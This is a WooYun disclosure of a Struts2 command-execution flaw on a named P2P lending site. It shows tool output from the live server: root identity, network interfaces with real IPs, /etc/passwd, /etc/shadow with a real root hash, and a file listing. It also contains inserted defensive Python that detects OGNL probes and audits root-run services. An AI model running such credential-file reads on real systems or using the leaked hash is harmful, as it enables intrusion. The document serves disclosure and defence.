
Vulnerability summary

Defect ID: wooyun-2016-0168876

Title: 乐凑贷 P2P platform has a Struts2 command execution vulnerability

Related vendor: 乐凑贷

Author: dloved

Submitted: 2016-01-13 16:09

Fixed: 2016-02-27 11:49

Disclosed: 2016-02-27 11:49

Vulnerability type: command execution

Severity: High

Self-assessed Rank: 15

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2016-01-13: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed
2016-02-27: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

乐凑贷, "the first, largest and safest P2P online investment and lending platform", has a Struts2 command execution vulnerability that allows arbitrary commands to be executed. The platform does have some protective measures: once an attack is detected, the source IP is blacklisted and blocked from accessing the site.
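The report says the platform detected the probing and blacklisted the source IP. The following is an added example, not code from the report or the platform, showing what such detection and blacklisting logic looks like on the defender's side: it parses common-log-format access log lines, flags requests to Struts actions that carry OGNL expression markers, and blacklists an IP once it exceeds a hit threshold. The log lines, IPs and paths are constructed for the example; the markers are the well-known detection signatures (expression delimiters and the OGNL context objects), not a working payload.

```python
"""Added example (not part of the original WooYun report): a minimal detector
for Struts2/OGNL command-execution probes in web access logs, with the per-IP
blacklisting behaviour the report says the platform used.
All log lines, IPs and paths below are constructed."""
import re
from collections import Counter
from urllib.parse import unquote

# Common log format: ip - - [time] "METHOD path HTTP/x" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \d+')

# Markers of OGNL expression evaluation in a request to a Struts2 action:
# the expression delimiters and the context objects such probes reference.
# These are detection signatures, not a payload.
OGNL_MARKERS = ("%{", "${", "_memberaccess", "ognlcontext")

SAMPLE_LOG = """\
203.0.113.7 - - [13/Jan/2016:16:01:02 +0800] "GET /index.action HTTP/1.1" 200 5120
203.0.113.7 - - [13/Jan/2016:16:01:05 +0800] "GET /index.action?q=%25%7B1%2B1%7D HTTP/1.1" 302 0
203.0.113.7 - - [13/Jan/2016:16:01:09 +0800] "GET /index.action?x=%24%7B%23_memberAccess%7D HTTP/1.1" 500 0
198.51.100.9 - - [13/Jan/2016:16:02:00 +0800] "GET /login.action?user=alice HTTP/1.1" 200 2048
198.51.100.9 - - [13/Jan/2016:16:02:10 +0800] "POST /login.action HTTP/1.1" 200 2048
"""


def is_struts_probe(path: str) -> bool:
    """True if the request targets a Struts action and carries an OGNL marker."""
    # Decode twice so that double-encoded delimiters (%2525 -> %25 -> %) are caught too.
    decoded = unquote(unquote(path)).lower()
    if ".action" not in decoded and ".do" not in decoded:
        return False
    return any(marker in decoded for marker in OGNL_MARKERS)


def scan(log_text: str, threshold: int = 2):
    """Return (probe hits per IP, set of IPs that crossed the blacklist threshold)."""
    hits = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        ip, _method, path, _status = m.groups()
        if is_struts_probe(path):
            hits[ip] += 1
    blacklist = {ip for ip, count in hits.items() if count >= threshold}
    return hits, blacklist


if __name__ == "__main__":
    hits, blacklist = scan(SAMPLE_LOG)
    print("probe hits per IP:", dict(hits))
    print("IPs to blacklist:", sorted(blacklist))
```

In the constructed log, 203.0.113.7 sends two requests with OGNL markers and crosses the threshold, while 198.51.100.9 only makes ordinary requests to a `.action` URL and is left alone. A real deployment would feed the blacklist to the WAF or firewall and would also inspect the `Content-Type` header, which is not present in common-log-format lines.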

Detailed description:

Vulnerable URL

http://www.lecoudai.com/index.action


[Screenshot: 11111.png]


Whoami: root
WebPath: /mnt2/lcd/WebRoot-pc
OS.Name: Linux
OS.Version: 2.6.32-431.23.3.el6.x86_64
Java.Home: /root/jdk1.6.0_45/jre
Java.Version: 1.6.0_45
OS.arch: amd64
User.Name: root
User.Home: /root
User.Dir: /root
Java.Class.Path: :/mnt/lcd/apache-tomcat-6.0.18-pc/bin/bootstrap.jar
Java.IO.Tmpdir: /mnt/lcd/apache-tomcat-6.0.18-pc/temp


K8cmd-> ifconfig
====================================================================================================================================
eth0 Link encap:Ethernet HWaddr 00:16:3E:00:1B:A8
inet addr:10.171.113.239 Bcast:10.171.119.255 Mask:255.255.248.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5253551 errors:0 dropped:0 overruns:0 frame:0
TX packets:896113 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1286062662 (1.1 GiB) TX bytes:1003121610 (956.6 MiB)
Interrupt:164
eth1 Link encap:Ethernet HWaddr 00:16:3E:00:46:9D
inet addr:182.92.97.174 Bcast:182.92.99.255 Mask:255.255.252.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:41758480 errors:0 dropped:0 overruns:0 frame:0
TX packets:932787 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1799216138 (1.6 GiB) TX bytes:1353514181 (1.2 GiB)
Interrupt:163
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:207528 errors:0 dropped:0 overruns:0 frame:0
TX packets:207528 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:621199770 (592.4 MiB) TX bytes:621199770 (592.4 MiB)


K8cmd-> cat /etc/passwd
====================================================================================================================================
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
nginx:x:498:499:Nginx web server:/var/lib/nginx:/sbin/nologin


K8cmd-> cat /etc/shadow
====================================================================================================================================
root:$6$7mDyuzXE$kybTSdnm17WXo.HLy1G.C41FWft0Zs/3q9la4XIak8VTMUf.YZrm/jE9vzWWIcfHaUIAFBvMFNSHiiCCiyctJ0:16684:0:99999:7:::
bin:*:15980:0:99999:7:::
daemon:*:15980:0:99999:7:::
adm:*:15980:0:99999:7:::
lp:*:15980:0:99999:7:::
sync:*:15980:0:99999:7:::
shutdown:*:15980:0:99999:7:::
halt:*:15980:0:99999:7:::
mail:*:15980:0:99999:7:::
uucp:*:15980:0:99999:7:::
operator:*:15980:0:99999:7:::
games:*:15980:0:99999:7:::
gopher:*:15980:0:99999:7:::
ftp:*:15980:0:99999:7:::
nobody:*:15980:0:99999:7:::
dbus:!!:16296::::::
vcsa:!!:16296::::::
abrt:!!:16296::::::
haldaemon:!!:16296::::::
ntp:!!:16296::::::
saslauth:!!:16296::::::
postfix:!!:16296::::::
sshd:!!:16296::::::
tcpdump:!!:16296::::::
nscd:!!:16296::::::
nginx:!!:16664::::::


K8cmd-> ls -l
====================================================================================================================================
总用量 21988
-rw-r--r-- 1 root root 7462611 5月 8 2015 apache-tomcat-6.0.44.zip
-rw-r--r-- 1 root root 16 9月 7 16:35 bak.jsp
-rwxr-xr-x 1 root root 4 12月 13 00:34 idus.log
drwxr-xr-x 8 root root 4096 3月 27 2013 jdk1.6.0_45
drwxr-xr-x 9 1001 1001 4096 8月 17 16:32 nginx-1.8.0
-rw-r--r-- 1 root root 832104 4月 21 2015 nginx-1.8.0.tar.gz
drwxr-xr-x 2 root root 4096 10月 14 18:44 proxy-2.2.4
-rw-r--r-- 1 root root 81920 4月 13 2012 proxy.tar
-rw-r--r-- 1 root root 3456 8月 19 15:16 sendSMS.class
-rw-r--r-- 1 root root 2012 8月 19 15:18 sendSMS.zip
-rwxr-xr-x 1 root root 4 12月 13 00:34 vga.conf
-rw-r--r-- 1 root root 14100112 7月 11 2015 ??.rar


The server is configured directly with the public IP address 182.92.97.174 and has port 22 open, so its SSH service is reachable from the internet.

[Screenshot: 2222.png]


Because the access was treated as malicious, my IP was blocked and I could not finish the related testing; it would also be possible to create an account and upload a backdoor to obtain a webshell.
Please confirm the vulnerability and fix it as soon as possible.
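Two exposures stand out in the output above besides the Struts2 bug itself: the web application runs as root (Whoami: root, User.Home: /root) and the host sits directly on a public address with SSH listening. The following is an added example, not the report's or the vendor's code, of a small audit that a defender could run over process and listening-socket listings to catch both conditions. The listings are constructed to mirror the report (the Tomcat JVM as root, sshd on all interfaces, the public address 182.92.97.174); the assumed input formats are the output of `ps -eo user,pid,comm` and `ss -ltn`.

```python
"""Added example (not part of the original WooYun report): audit constructed
process and listening-socket listings for two exposures visible in the report,
a service process running as root and services listening on a public interface.
Listings below are constructed; assumed formats are `ps -eo user,pid,comm`
and `ss -ltn` (State Recv-Q Send-Q Local:Port Peer:Port)."""
from dataclasses import dataclass
import ipaddress

PS_OUTPUT = """\
USER       PID COMMAND
root         1 init
root      1234 java
nginx     2001 nginx
root      2100 sshd
"""

SS_OUTPUT = """\
State   Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN  0      128    0.0.0.0:22         0.0.0.0:*
LISTEN  0      100    127.0.0.1:8005     0.0.0.0:*
LISTEN  0      100    10.171.113.239:8080 0.0.0.0:*
LISTEN  0      128    182.92.97.174:80   0.0.0.0:*
"""

# Process names that should run under a dedicated unprivileged account.
SERVICE_PROCS = {"java", "tomcat", "nginx", "httpd"}


@dataclass
class Finding:
    kind: str
    detail: str


def find_root_services(ps_text: str):
    """Flag service processes (web/app servers) whose owner is root."""
    findings = []
    for line in ps_text.splitlines()[1:]:  # skip header
        user, pid, comm = line.split(None, 2)
        if user == "root" and comm in SERVICE_PROCS:
            findings.append(Finding("root-service", f"{comm} (pid {pid}) runs as root"))
    return findings


def is_public(addr: str) -> bool:
    """True for wildcard binds and globally routable addresses."""
    if addr in ("0.0.0.0", "*", "::", "[::]"):
        return True
    try:
        return ipaddress.ip_address(addr.strip("[]")).is_global
    except ValueError:
        return False


def find_public_listeners(ss_text: str, allowed_ports=(80, 443)):
    """Flag listeners reachable from the internet on ports other than the web ports."""
    findings = []
    for line in ss_text.splitlines()[1:]:  # skip header
        parts = line.split()
        if len(parts) < 4 or parts[0] != "LISTEN":
            continue
        host, _, port = parts[3].rpartition(":")
        if is_public(host) and int(port) not in allowed_ports:
            findings.append(Finding("public-listener", f"{parts[3]} reachable from the internet"))
    return findings


def audit(ps_text: str = PS_OUTPUT, ss_text: str = SS_OUTPUT):
    """Run both checks over the given listings and return the combined findings."""
    return find_root_services(ps_text) + find_public_listeners(ss_text)


if __name__ == "__main__":
    for f in audit():
        print(f"[{f.kind}] {f.detail}")
```

On the constructed input the audit reports the Java process running as root and sshd bound to 0.0.0.0:22; the Tomcat port on the private 10.x address and the shutdown port on loopback are not flagged, and port 80 on the public address is accepted as an intended web listener. With a Struts2 command execution bug, a root-owned JVM turns the bug into full host compromise, which is why the process owner check matters as much as patching.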

Proof of vulnerability:

Same tool output as in the detailed description above.


Fix recommendation:

Patch the Struts vulnerability or upgrade Struts.

Copyright notice: please credit dloved@乌云 when reposting.


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively declined to respond